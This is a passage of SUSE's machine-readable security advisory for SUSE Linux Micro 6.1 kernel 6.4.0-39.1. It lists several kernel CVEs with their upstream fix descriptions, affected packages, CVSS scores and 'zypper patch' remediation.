"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68757",
"url": "https://www.suse.com/security/cve/CVE-2025-68757"
},
{
"category": "external",
"summary": "SUSE Bug 1255943 for CVE-2025-68757",
"url": "https://bugzilla.suse.com/1255943"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68757"
},
{
"cve": "CVE-2025-68758",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68758"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nbacklight: led-bl: Add devlink to supplier LEDs\n\nLED Backlight is a consumer of one or multiple LED class devices, but\ndevlink is currently unable to create correct supplier-producer links when\nthe supplier is a class device. It creates instead a link where the\nsupplier is the parent of the expected device.\n\nOne consequence is that removal order is not correctly enforced.\n\nIssues happen for example with the following sections in a device tree\noverlay:\n\n // An LED driver chip\n pca9632@62 {\n compatible = \"nxp,pca9632\";\n reg = \u003c0x62\u003e;\n\n\t// ...\n\n addon_led_pwm: led-pwm@3 {\n reg = \u003c3\u003e;\n label = \"addon:led:pwm\";\n };\n };\n\n backlight-addon {\n compatible = \"led-backlight\";\n leds = \u003c\u0026addon_led_pwm\u003e;\n brightness-levels = \u003c255\u003e;\n default-brightness-level = \u003c255\u003e;\n };\n\nIn this example, the devlink should be created between the backlight-addon\n(consumer) and the pca9632@62 (supplier). Instead it is created between the\nbacklight-addon (consumer) and the parent of the pca9632@62, which is\ntypically the I2C bus adapter.\n\nOn removal of the above overlay, the LED driver can be removed before the\nbacklight device, resulting in:\n\n Unable to handle kernel NULL pointer dereference at virtual address 0000000000000010\n ...\n Call trace:\n led_put+0xe0/0x140\n devm_led_release+0x6c/0x98\n\nAnother way to reproduce the bug without any device tree overlays is\nunbinding the LED class device (pca9632@62) before unbinding the consumer\n(backlight-addon):\n\n echo 11-0062 \u003e/sys/bus/i2c/drivers/leds-pca963x/unbind\n echo ...backlight-dock \u003e/sys/bus/platform/drivers/led-backlight/unbind\n\nFix by adding a devlink between the consuming led-backlight device and the\nsupplying LED device, as other drivers and subsystems do as well.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68758",
"url": "https://www.suse.com/security/cve/CVE-2025-68758"
},
{
"category": "external",
"summary": "SUSE Bug 1255944 for CVE-2025-68758",
"url": "https://bugzilla.suse.com/1255944"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68758"
},
{
"cve": "CVE-2025-68759",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68759"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nwifi: rtl818x: Fix potential memory leaks in rtl8180_init_rx_ring()\n\nIn rtl8180_init_rx_ring(), memory is allocated for skb packets and DMA\nallocations in a loop. When an allocation fails, the previously\nsuccessful allocations are not freed on exit.\n\nFix that by jumping to err_free_rings label on error, which calls\nrtl8180_free_rx_ring() to free the allocations. Remove the free of\nrx_ring in rtl8180_init_rx_ring() error path, and set the freed\npriv-\u003erx_buf entry to null, to avoid double free.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68759",
"url": "https://www.suse.com/security/cve/CVE-2025-68759"
},
{
"category": "external",
"summary": "SUSE Bug 1255934 for CVE-2025-68759",
"url": "https://bugzilla.suse.com/1255934"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68759"
},
{
"cve": "CVE-2025-68764",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68764"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nNFS: Automounted filesystems should inherit ro,noexec,nodev,sync flags\n\nWhen a filesystem is being automounted, it needs to preserve the\nuser-set superblock mount options, such as the \"ro\" flag.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68764",
"url": "https://www.suse.com/security/cve/CVE-2025-68764"
},
{
"category": "external",
"summary": "SUSE Bug 1255930 for CVE-2025-68764",
"url": "https://bugzilla.suse.com/1255930"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68764"
},
{
"cve": "CVE-2025-68765",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68765"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nmt76: mt7615: Fix memory leak in mt7615_mcu_wtbl_sta_add()\n\nIn mt7615_mcu_wtbl_sta_add(), an skb sskb is allocated. If the\nsubsequent call to mt76_connac_mcu_alloc_wtbl_req() fails, the function\nreturns an error without freeing sskb, leading to a memory leak.\n\nFix this by calling dev_kfree_skb() on sskb in the error handling path\nto ensure it is properly released.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68765",
"url": "https://www.suse.com/security/cve/CVE-2025-68765"
},
{
"category": "external",
"summary": "SUSE Bug 1255931 for CVE-2025-68765",
"url": "https://bugzilla.suse.com/1255931"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T09:10:01Z",
"details": "moderate"
}
],
"title": "CVE-2025-68765"
},
{
"cve": "CVE-2025-68766",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-68766"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nirqchip/mchp-eic: Fix error code in mchp_eic_domain_alloc()\n\nIf irq_domain_translate_twocell() sets \"hwirq\" to \u003e= MCHP_EIC_NIRQ (2) then\nit results in an out of bounds access.\n\nThe code checks for invalid values, but doesn\u0027t set the error code. Return\n-EINVAL in that case, instead of returning success.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.ppc64le",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-devel-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.1:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.1:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.1:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-68766",
"url": "https://www.suse.com/security/cve/CVE-2025-68766"
},
{
